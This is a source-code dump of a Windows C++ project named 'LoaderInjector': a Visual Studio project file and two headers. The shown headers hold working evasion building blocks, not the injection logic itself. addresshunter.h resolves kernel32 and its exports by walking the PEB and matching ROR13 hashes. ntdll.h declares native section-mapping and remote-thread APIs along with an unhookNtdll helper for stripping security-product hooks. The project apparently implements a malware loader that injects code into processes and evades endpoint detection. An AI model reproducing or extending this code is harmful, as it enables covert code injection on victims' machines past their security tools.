 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="main.cpp" />
143 |     <ClCompile Include="ntdll.cpp" />
144 |   </ItemGroup>
145 |   <ItemGroup>
146 |     <ClInclude Include="addresshunter.h" />
147 |     <ClInclude Include="ntdll.h" />
148 |     <ClInclude Include="resource.h" />
149 |   </ItemGroup>
150 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
151 |   <ImportGroup Label="ExtensionTargets">
152 |   </ImportGroup>
153 | </Project>


--------------------------------------------------------------------------------
/LoaderInjector/addresshunter.h:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <inttypes.h>
  3 | 
  4 | #define DEREF( name )*(UINT_PTR *)(name)
  5 | #define DEREF_64( name )*(DWORD64 *)(name)
  6 | #define DEREF_32( name )*(DWORD *)(name)
  7 | #define DEREF_16( name )*(WORD *)(name)
  8 | #define DEREF_8( name )*(BYTE *)(name)
  9 | 
 10 | #define KERNEL32DLL_HASH 0x6A4ABC5B
 11 | 
 12 | 
 13 | typedef struct _UNICODE_STR
 14 | {
 15 |     USHORT Length;
 16 |     USHORT MaximumLength;
 17 |     PWSTR pBuffer;
 18 | } UNICODE_STR, * PUNICODE_STR;
 19 | 
 20 | 
 21 | typedef struct _PEB_LDR_DATA
 22 | {
 23 |     DWORD dwLength;
 24 |     DWORD dwInitialized;
 25 |     LPVOID lpSsHandle;
 26 |     LIST_ENTRY InLoadOrderModuleList;
 27 |     LIST_ENTRY InMemoryOrderModuleList;
 28 |     LIST_ENTRY InInitializationOrderModuleList;
 29 |     LPVOID lpEntryInProgress;
 30 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
 31 | 
 32 | 
 33 | typedef struct _LDR_DATA_TABLE_ENTRY
 34 | {
 35 |     LIST_ENTRY InMemoryOrderModuleList;
 36 |     LIST_ENTRY InInitializationOrderModuleList;
 37 |     PVOID DllBase;
 38 |     PVOID EntryPoint;
 39 |     ULONG SizeOfImage;
 40 |     UNICODE_STR FullDllName;
 41 |     UNICODE_STR BaseDllName;
 42 |     ULONG Flags;
 43 |     SHORT LoadCount;
 44 |     SHORT TlsIndex;
 45 |     LIST_ENTRY HashTableEntry;
 46 |     ULONG TimeDateStamp;
 47 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
 48 | 
 49 | 
 50 | typedef struct _PEB_FREE_BLOCK
 51 | {
 52 |     struct _PEB_FREE_BLOCK* pNext;
 53 |     DWORD dwSize;
 54 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
 55 | 
 56 | 
 57 | typedef struct __PEB
 58 | {
 59 |     BYTE bInheritedAddressSpace;
 60 |     BYTE bReadImageFileExecOptions;
 61 |     BYTE bBeingDebugged;
 62 |     BYTE bSpareBool;
 63 |     LPVOID lpMutant;
 64 |     LPVOID lpImageBaseAddress;
 65 |     PPEB_LDR_DATA pLdr;
 66 |     LPVOID lpProcessParameters;
 67 |     LPVOID lpSubSystemData;
 68 |     LPVOID lpProcessHeap;
 69 |     PRTL_CRITICAL_SECTION pFastPebLock;
 70 |     LPVOID lpFastPebLockRoutine;
 71 |     LPVOID lpFastPebUnlockRoutine;
 72 |     DWORD dwEnvironmentUpdateCount;
 73 |     LPVOID lpKernelCallbackTable;
 74 |     DWORD dwSystemReserved;
 75 |     DWORD dwAtlThunkSListPtr32;
 76 |     PPEB_FREE_BLOCK pFreeList;
 77 |     DWORD dwTlsExpansionCounter;
 78 |     LPVOID lpTlsBitmap;
 79 |     DWORD dwTlsBitmapBits[2];
 80 |     LPVOID lpReadOnlySharedMemoryBase;
 81 |     LPVOID lpReadOnlySharedMemoryHeap;
 82 |     LPVOID lpReadOnlyStaticServerData;
 83 |     LPVOID lpAnsiCodePageData;
 84 |     LPVOID lpOemCodePageData;
 85 |     LPVOID lpUnicodeCaseTableData;
 86 |     DWORD dwNumberOfProcessors;
 87 |     DWORD dwNtGlobalFlag;
 88 |     LARGE_INTEGER liCriticalSectionTimeout;
 89 |     DWORD dwHeapSegmentReserve;
 90 |     DWORD dwHeapSegmentCommit;
 91 |     DWORD dwHeapDeCommitTotalFreeThreshold;
 92 |     DWORD dwHeapDeCommitFreeBlockThreshold;
 93 |     DWORD dwNumberOfHeaps;
 94 |     DWORD dwMaximumNumberOfHeaps;
 95 |     LPVOID lpProcessHeaps;
 96 |     LPVOID lpGdiSharedHandleTable;
 97 |     LPVOID lpProcessStarterHelper;
 98 |     DWORD dwGdiDCAttributeList;
 99 |     LPVOID lpLoaderLock;
100 |     DWORD dwOSMajorVersion;
101 |     DWORD dwOSMinorVersion;
102 |     WORD wOSBuildNumber;
103 |     WORD wOSCSDVersion;
104 |     DWORD dwOSPlatformId;
105 |     DWORD dwImageSubsystem;
106 |     DWORD dwImageSubsystemMajorVersion;
107 |     DWORD dwImageSubsystemMinorVersion;
108 |     DWORD dwImageProcessAffinityMask;
109 |     DWORD dwGdiHandleBuffer[34];
110 |     LPVOID lpPostProcessInitRoutine;
111 |     LPVOID lpTlsExpansionBitmap;
112 |     DWORD dwTlsExpansionBitmapBits[32];
113 |     DWORD dwSessionId;
114 |     ULARGE_INTEGER liAppCompatFlags;
115 |     ULARGE_INTEGER liAppCompatFlagsUser;
116 |     LPVOID lppShimData;
117 |     LPVOID lpAppCompatInfo;
118 |     UNICODE_STR usCSDVersion;
119 |     LPVOID lpActivationContextData;
120 |     LPVOID lpProcessAssemblyStorageMap;
121 |     LPVOID lpSystemDefaultActivationContextData;
122 |     LPVOID lpSystemAssemblyStorageMap;
123 |     DWORD dwMinimumStackCommit;
124 | } _PEB, * _PPEB;
125 | 
126 | 
127 | __forceinline DWORD ror13(DWORD d)
128 | {
129 |     return _rotr(d, 13);
130 | }
131 | 
132 | 
133 | int my_strcmp(const char* p1, const char* p2) {
134 |     const unsigned char* s1 = (const unsigned char*)p1;
135 |     const unsigned char* s2 = (const unsigned char*)p2;
136 |     unsigned char c1, c2;
137 |     do {
138 |         c1 = (unsigned char)*s1++;
139 |         c2 = (unsigned char)*s2++;
140 |         if (c1 == '\0') {
141 |             return c1 - c2;
142 |         }
143 |     } while (c1 == c2);
144 |     return c1 - c2;
145 | }
146 | 
147 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
148 |     char* d = (char*)dest;
149 |     char* s = (char*)src;
150 |     if (d < s)
151 |         while (len--)
152 |             *d++ = *s++;
153 |     else {
154 |         char* lasts = s + (len - 1);
155 |         char* lastd = d + (len - 1);
156 |         while (len--)
157 |             *lastd-- = *lasts--;
158 |     }
159 |     return dest;
160 | }
161 | 
162 | UINT64 GetKernel32() {
163 |     ULONG_PTR kernel32dll, val1, val2, val3;
164 |     USHORT usCounter;
165 | 
166 |     kernel32dll = __readgsqword(0x60);
167 | 
168 |     kernel32dll = (ULONG_PTR)((_PPEB)kernel32dll)->pLdr;
169 |     val1 = (ULONG_PTR)((PPEB_LDR_DATA)kernel32dll)->InMemoryOrderModuleList.Flink;
170 |     while (val1) {
171 |         val2 = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer;
172 |         usCounter = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.Length;
173 |         val3 = 0;
174 | 
175 | 
176 |         do {
177 |             val3 = ror13((DWORD)val3);
178 |             if (*((BYTE*)val2) >= 'a')
179 |                 val3 += *((BYTE*)val2) - 0x20;
180 |             else
181 |                 val3 += *((BYTE*)val2);
182 |             val2++;
183 |         } while (--usCounter);
184 | 
185 |         // compare the hash kernel32.dll
186 |         if ((DWORD)val3 == KERNEL32DLL_HASH) {
187 |             //return kernel32.dll if found
188 |             kernel32dll = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase;
189 |             return kernel32dll;
190 |         }
191 |         val1 = DEREF(val1);
192 |     }
193 |     return 0;
194 | }
195 | 
196 | UINT64 GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
197 |     UINT64 dllAddress = (UINT64)hModule,
198 |         symbolAddress = 0,
199 |         exportedAddressTable = 0,
200 |         namePointerTable = 0,
201 |         ordinalTable = 0;
202 | 
203 |     if (hModule == NULL) {
204 |         return 0;
205 |     }
206 | 
207 |     PIMAGE_NT_HEADERS ntHeaders = NULL;
208 |     PIMAGE_DATA_DIRECTORY dataDirectory = NULL;
209 |     PIMAGE_EXPORT_DIRECTORY exportDirectory = NULL;
210 | 
211 |     ntHeaders = (PIMAGE_NT_HEADERS)(dllAddress + ((PIMAGE_DOS_HEADER)dllAddress)->e_lfanew);
212 |     dataDirectory = (PIMAGE_DATA_DIRECTORY)&ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
213 |     exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(dllAddress + dataDirectory->VirtualAddress);
214 | 
215 |     exportedAddressTable = (dllAddress + exportDirectory->AddressOfFunctions);
216 |     namePointerTable = (dllAddress + exportDirectory->AddressOfNames);
217 |     ordinalTable = (dllAddress + exportDirectory->AddressOfNameOrdinals);
218 | 
219 |     if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
220 |         exportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - exportDirectory->Base) * sizeof(DWORD));
221 |         symbolAddress = (UINT64)(dllAddress + DEREF_32(exportedAddressTable));
222 |     }
223 |     else {
224 |         DWORD dwCounter = exportDirectory->NumberOfNames;
225 |         while (dwCounter--) {
226 |             char* cpExportedFunctionName = (char*)(dllAddress + DEREF_32(namePointerTable));
227 |             if (my_strcmp(cpExportedFunctionName, lpProcName) == 0) {
228 |                 exportedAddressTable += (DEREF_16(ordinalTable) * sizeof(DWORD));
229 |                 symbolAddress = (UINT64)(dllAddress + DEREF_32(exportedAddressTable));
230 |                 break;
231 |             }
232 |             namePointerTable += sizeof(DWORD);
233 |             ordinalTable += sizeof(WORD);
234 |         }
235 |     }
236 | 
237 |     return symbolAddress;
238 | }


--------------------------------------------------------------------------------
/LoaderInjector/ntdll.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | #include <Windows.h>
  4 | #include <psapi.h>
  5 | 
  6 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
  7 | #if !defined PROCESSINFOCLASS
  8 | typedef LONG PROCESSINFOCLASS;
  9 | #endif
 10 | 
 11 | typedef enum _SECTION_INHERIT {
 12 | 	ViewShare = 1,
 13 | 	ViewUnmap = 2
 14 | } SECTION_INHERIT, * PSECTION_INHERIT;
 15 | 
 16 | 
 17 | typedef struct _UNICODE_STRING {
 18 | 	USHORT Length;
 19 | 	USHORT MaximumLength;
 20 | 	PWSTR  Buffer;
 21 | } UNICODE_STRING, * PUNICODE_STRING;
 22 | 
 23 | typedef struct _OBJECT_ATTRIBUTES {
 24 | 	ULONG Length;
 25 | 	HANDLE RootDirectory;
 26 | 	PUNICODE_STRING ObjectName;
 27 | 	ULONG Attributes;
 28 | 	PVOID SecurityDescriptor;
 29 | 	PVOID SecurityQualityOfService;
 30 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
 31 | 
 32 | typedef struct _CLIENT_ID {
 33 | 	HANDLE UniqueProcess;
 34 | 	HANDLE UniqueThread;
 35 | } CLIENT_ID, * PCLIENT_ID;
 36 | 
 37 | typedef struct _RTL_DRIVE_LETTER_CURDIR {
 38 | 	USHORT Flags;
 39 | 	USHORT Length;
 40 | 	ULONG TimeStamp;
 41 | 	UNICODE_STRING DosPath;
 42 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
 43 | 
 44 | typedef struct _SECTION_IMAGE_INFORMATION {
 45 | 	PVOID EntryPoint;
 46 | 	ULONG StackZeroBits;
 47 | 	ULONG StackReserved;
 48 | 	ULONG StackCommit;
 49 | 	ULONG ImageSubsystem;
 50 | 	WORD SubSystemVersionLow;
 51 | 	WORD SubSystemVersionHigh;
 52 | 	ULONG Unknown1;
 53 | 	ULONG ImageCharacteristics;
 54 | 	ULONG ImageMachineType;
 55 | 	ULONG Unknown2[3];
 56 | } SECTION_IMAGE_INFORMATION, * PSECTION_IMAGE_INFORMATION;
 57 | 
 58 | typedef struct _RTL_USER_PROCESS_PARAMETERS {
 59 | 	ULONG MaximumLength;
 60 | 	ULONG Length;
 61 | 	ULONG Flags;
 62 | 	ULONG DebugFlags;
 63 | 	PVOID ConsoleHandle;
 64 | 	ULONG ConsoleFlags;
 65 | 	HANDLE StdInputHandle;
 66 | 	HANDLE StdOutputHandle;
 67 | 	HANDLE StdErrorHandle;
 68 | 	UNICODE_STRING CurrentDirectoryPath;
 69 | 	HANDLE CurrentDirectoryHandle;
 70 | 	UNICODE_STRING DllPath;
 71 | 	UNICODE_STRING ImagePathName;
 72 | 	UNICODE_STRING CommandLine;
 73 | 	PVOID Environment;
 74 | 	ULONG StartingPositionLeft;
 75 | 	ULONG StartingPositionTop;
 76 | 	ULONG Width;
 77 | 	ULONG Height;
 78 | 	ULONG CharWidth;
 79 | 	ULONG CharHeight;
 80 | 	ULONG ConsoleTextAttributes;
 81 | 	ULONG WindowFlags;
 82 | 	ULONG ShowWindowFlags;
 83 | 	UNICODE_STRING WindowTitle;
 84 | 	UNICODE_STRING DesktopName;
 85 | 	UNICODE_STRING ShellInfo;
 86 | 	UNICODE_STRING RuntimeData;
 87 | 	RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
 88 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
 89 | 
 90 | typedef struct _RTL_USER_PROCESS_INFORMATION {
 91 | 	ULONG Size;
 92 | 	HANDLE ProcessHandle;
 93 | 	HANDLE ThreadHandle;
 94 | 	CLIENT_ID ClientId;
 95 | 	SECTION_IMAGE_INFORMATION ImageInformation;
 96 | } RTL_USER_PROCESS_INFORMATION, * PRTL_USER_PROCESS_INFORMATION;
 97 | 
 98 | 
 99 | /* functions */
100 | typedef NTSTATUS(NTAPI* NtCreateSection_t) (
101 | 	OUT PHANDLE SectionHandle,
102 | 	IN ULONG DesiredAccess,
103 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
104 | 	IN PLARGE_INTEGER MaximumSize OPTIONAL,
105 | 	IN ULONG PageAttributess,
106 | 	IN ULONG SectionAttributes,
107 | 	IN HANDLE FileHandle OPTIONAL
108 | 	);
109 | extern NtCreateSection_t NtCreateSection;
110 | 
111 | typedef NTSTATUS(NTAPI* NtMapViewOfSecion_t) (
112 | 	IN HANDLE SectionHandle,
113 | 	IN HANDLE ProcessHandle,
114 | 	IN OUT PVOID* BaseAddress OPTIONAL,
115 | 	IN ULONG ZeroBits OPTIONAL,
116 | 	IN ULONG CommitSize,
117 | 	IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
118 | 	IN OUT PULONG ViewSize,
119 | 	IN SECTION_INHERIT InheritDisposition,
120 | 	IN ULONG AllocationType OPTIONAL,
121 | 	IN ULONG Protect
122 | 	);
123 | extern NtMapViewOfSecion_t NtMapViewOfSection;
124 | 
125 | typedef NTSTATUS(NTAPI* NtUnmapViewOfSection_t) (
126 | 	IN HANDLE ProcessHandle,
127 | 	IN PVOID BaseAddress
128 | 	);
129 | extern NtUnmapViewOfSection_t NtUnmapViewOfSection;
130 | 
131 | typedef VOID(NTAPI* RtlInitUnicodeString_t) (
132 | 	OUT PUNICODE_STRING DestinationString,
133 | 	IN PCWSTR SourceString OPTIONAL
134 | 	);
135 | extern RtlInitUnicodeString_t RtlInitUnicodeString;
136 | 
137 | typedef NTSTATUS(NTAPI* RtlCreateProcessParameters_t) (
138 | 	OUT PRTL_USER_PROCESS_PARAMETERS* ProcessParameters,
139 | 	IN PUNICODE_STRING ImagePathName,
140 | 	IN PUNICODE_STRING DllPath OPTIONAL,
141 | 	IN PUNICODE_STRING CurrentDirectoryPath OPTIONAL,
142 | 	IN PUNICODE_STRING CommandLine OPTIONAL,
143 | 	IN PVOID Environment OPTIONAL,
144 | 	IN PUNICODE_STRING WindowTitle OPTIONAL,
145 | 	IN PUNICODE_STRING DesktopName OPTIONAL,
146 | 	IN PUNICODE_STRING ShellInfo OPTIONAL,
147 | 	IN PUNICODE_STRING RuntimeData OPTIONAL
148 | 	);
149 | extern RtlCreateProcessParameters_t RtlCreateProcessParameters;
150 | 
151 | typedef NTSTATUS(NTAPI* RtlCreateUserProcess_t) (
152 | 	IN PUNICODE_STRING ImagePath,
153 | 	IN ULONG ObjectAttributes,
154 | 	IN OUT PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
155 | 	IN PSECURITY_DESCRIPTOR ProcessSecurityDescriptor OPTIONAL,
156 | 	IN PSECURITY_DESCRIPTOR ThreadSecurityDescriptor OPTIONAL,
157 | 	IN HANDLE ParentProcess,
158 | 	IN BOOLEAN InheritHandles,
159 | 	IN HANDLE DebugPort OPTIONAL,
160 | 	IN HANDLE ExceptionPort OPTIONAL,
161 | 	OUT PRTL_USER_PROCESS_INFORMATION ProcessInformation);
162 | extern RtlCreateUserProcess_t RtlCreateUserProcess;
163 | 
164 | typedef NTSTATUS(NTAPI* RtlCreateUserThread_t) (
165 | 	IN HANDLE ProcessHandle,
166 | 	IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
167 | 	IN BOOLEAN CreateSuspended,
168 | 	IN ULONG StackZeroBits,
169 | 	IN OUT PULONG StackReserved,
170 | 	IN OUT PULONG StackCommit,
171 | 	IN PVOID StartAddress,
172 | 	IN PVOID StartParameter OPTIONAL,
173 | 	OUT PHANDLE ThreadHandle,
174 | 	OUT PCLIENT_ID ClientID
175 | 	);
176 | extern RtlCreateUserThread_t RtlCreateUserThread;
177 | 
178 | typedef NTSTATUS(NTAPI* NtClose_t) (
179 | 	IN HANDLE ObjectHandle
180 | 	);
181 | extern NtClose_t NtClose;
182 | 
183 | typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
184 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
185 | 		(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
186 | 		(p)->RootDirectory = r;                           \
187 | 		(p)->Attributes = a;                              \
188 | 		(p)->ObjectName = n;                              \
189 | 		(p)->SecurityDescriptor = s;                      \
190 | 		(p)->SecurityQualityOfService = NULL;             \
191 | 		}
192 | 
193 | 
194 | typedef NTSTATUS(NTAPI* ZwCreateSection_t)(
195 | 	_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
196 | 	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
197 | 	_In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
198 | 	_In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle
199 | );
200 | extern ZwCreateSection_t ZwCreateSection;
201 | 
202 | typedef NTSTATUS(NTAPI* ZwCreateThreadEx_t)(
203 | 	_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess,
204 | 	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle,
205 | 	_In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags,
206 | 	_In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize,
207 | 	_In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList
208 | );
209 | extern ZwCreateThreadEx_t ZwCreateThreadEx;
210 | 
211 | 
212 | typedef NTSTATUS(NTAPI* ZwUnmapViewOfSection_t)
213 | (_In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress);
214 | extern ZwUnmapViewOfSection_t ZwUnmapViewOfSection;
215 | 
216 | typedef NTSTATUS(NTAPI* ZwOpenProcess_t)
217 | (
218 | 	PHANDLE ProcessHandle,
219 | 	ACCESS_MASK DesiredAccess,
220 | 	POBJECT_ATTRIBUTES ObjectAttributes,
221 | 	PCLIENT_ID ClientID
222 | 	);
223 | extern ZwOpenProcess_t ZwOpenProcess;
224 | 
225 | typedef NTSTATUS(NTAPI* NtDelayExecution_t)(
226 | 	BOOL Alertable,
227 | 	PLARGE_INTEGER DelayInterval
228 | 	);
229 | extern NtDelayExecution_t NtDelayExecution;
230 | 
231 | typedef struct _PROCESS_BASIC_INFORMATION {
232 | 	PVOID Reserved1;
233 | 	PVOID PebBaseAddress;
234 | 	PVOID Reserved2[2];
235 | 	ULONG_PTR UniqueProcessId;
236 | 	PVOID Reserved3;
237 | } PROCESS_BASIC_INFORMATION;
238 | 
239 | 
240 | typedef NTSTATUS(NTAPI* NtResumeThread_t)(
241 | 	IN HANDLE ThreadHandle,
242 | 	OUT OPTIONAL PULONG SuspendCount
243 | 	);
244 | extern NtResumeThread_t NtResumeThread;
245 | 
246 | typedef HANDLE(WINAPI* CreateFileA_t)(
247 | 	IN           LPCSTR                lpFileName,
248 | 	IN           DWORD                 dwDesiredAccess,
249 | 	IN           DWORD                 dwShareMode,
250 | 	IN OPTIONAL  LPSECURITY_ATTRIBUTES lpSecurityAttributes,
251 | 	IN           DWORD                 dwCreationDisposition,
252 | 	IN           DWORD                 dwFlagsAndAttributes,
253 | 	IN OPTIONAL  HANDLE                hTemplateFile
254 | );
255 | extern CreateFileA_t pCreateFileA;
256 | 
257 | typedef BOOL(WINAPI* VirtualProtect_t)(
258 | 	LPVOID,
259 | 	SIZE_T,
260 | 	DWORD,
261 | 	PDWORD
262 | );
263 | extern VirtualProtect_t pVirtualProtect;
264 | 
265 | typedef HANDLE(WINAPI* CreateFileMappingA_t)(
266 | 	HANDLE,
267 | 	LPSECURITY_ATTRIBUTES,
268 | 	DWORD,
269 | 	DWORD,
270 | 	DWORD,
271 | 	LPCSTR
272 | );
273 | extern CreateFileMappingA_t pCreateFileMappingA;
274 | 
275 | typedef LPVOID(WINAPI* MapViewOfFile_t)(
276 | 	HANDLE,
277 | 	DWORD,
278 | 	DWORD,
279 | 	DWORD,
280 | 	SIZE_T
281 | );
282 | extern MapViewOfFile_t pMapViewOfFile;
283 | 
284 | /* helper functions */
285 | void unhookNtdll(HMODULE ntdll);
286 | void loadNtdll(HMODULE ntdll);
287 | void checkNtStatus(NTSTATUS status);
288 | int my_strcmp(const char* p1, const char* p2);
289 | UINT64 GetKernel32();
290 | UINT64 GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName);
291 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len);


--------------------------------------------------------------------------------